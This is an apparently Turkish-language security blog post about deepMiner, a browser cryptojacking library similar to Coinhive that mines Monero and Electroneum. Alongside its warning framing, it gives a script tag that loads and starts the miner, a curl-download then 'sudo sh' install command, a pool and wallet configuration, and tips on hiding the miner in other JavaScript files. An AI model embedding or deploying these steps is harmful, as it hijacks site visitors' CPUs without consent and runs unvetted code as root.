Bu yazımda sizlere daha yeni yeni kendini gösteren ve Coinhive adlı javascript zararlısından sonra geliştirilen bir mining kütüphanesi olan deepMiner’ı anlatmaya çalışacağım.
Nedir
Son zamanlarda hızla çoğalan javascript kötücüllerini hepiniz biliyorsunuz işte onlara bir yenisi daha eklendi. Bu kötücül vakti zamanında bahsedip USOM tarafından yasaklattığımız Coinhive ile birlikte çalışıyor.
CPU Hijacking tekniklerine devam ediyor ve CPU kaynaklarınızı sonuna kadar kullanarak başlıyor kazım işlemine.
- XMR(Monero)
- ETN(Electroneum)
Olarak 2 adet coin kazımı gerçekeştiriyor. Bu makaleyi yazmadan önce gerekli bildirimler yapılarak. Güvenik duvarı çözümlerinde yaptırımları sağladık ve anti-virüsleride konu hakkında bilgilendirdik.
Nasıl Kullanılır
Kullanımı oldukça basit olan bu uygulamada aşağıdaki kodu siteye eklemek yeterlidir. CPU hijacing işlemi yaparak kaynaklarınızı kullanmaya herhangi bir ayar gerekmeksizin başlar.
<script src="https://digxmr.com/deepMiner.js"></script>
<script>
var miner = new deepMiner.Anonymous('deepMiner_test').start();
</script>
Ayrıca kendinize göre derlemede yapabilirsiniz. Bu uygulama Coinhive göre daha tehlikelidir. Nerede ve ne şekilde kullanılacağı site sahibine kalmaktadır. Tespiti ve engellenmesi biraz daha zordur
Kurulum ve derleme işlemi için aşağıdaki komut kullanılmaktadır.
curl https://raw.githubusercontent.com/deepwn/deepMiner/master/install.sh > install.sh
sudo sh install.sh
Derlenebilmesi ve kurulabilmesi için nginx, nodejs, npm bağımlılıkları bulunmaktadır. Derleme işlemi için önerilen işletim sistemi ise Debian, Ubuntu dur.
Ardından config.json düzenlemesi yapılarak sistem çalıştırılabilir.
{
"lhost": "127.0.0.1",
"lport": 7777,
"domain": "xmrdig.com",
"pool": "pool.elitexmr.com:8080",
"addr": "41ynfGBUDbGJYYzz2jgSPG5mHrHJL4iMXEKh9EX6RfEiM9JuqHP66vuS2tRjYehJ3eRSt7FfoTdeVBfbvZ7Tesu1LKxioRU",
"pass": "",
"key": "",
"cert": ""
}
Ne işe yarar
Bu uygulama javascript ile geliştirilmiş bir mining proxy aracıdır. Aynı zamanda cüzdan görevi görmektedir. Tarayıcıda çalışabilmesi için tekrar düzenlenmiş ve bu iş için uygun olan 2 adet coini geliştirici arkadaş sisteme eklemiştir. VPS ve Dedicated sunucu üzerinde çalışmakta ve kullanıcısına belli bir oranda tespit edilememezlik sunmaktadır.
- pool.elitexmr.com:8080
- siapool.electroneum.com:3333
Adlı 2 adet Coin havuzunu otomatik olarak kullanmaktadır. İstenildiği taktirde havuzlar değiştirilebilmektedir. İstenilen her javascript dosyasının içerisine eklenebilir. Tespit edilmesini zorlaştırmak için bir takım işlemlere girilebilir. Web sitesi bağımsız olarak çalışabilmektedir.
Coinhive ile tamamen aynı olan yapısı ile üzerinde her türlü manipülasyon gerçekleştirilebilir. kurulan web sitesi üzerinde otomatik olarak mining işlemleri başka kişilerede aynı kod eklenerek aynı domain üzerinden sağlanabilmektedir.
dipnot: bu eklentinin kullanımından sonra doğacak sonuçlardan sorumlu değilim.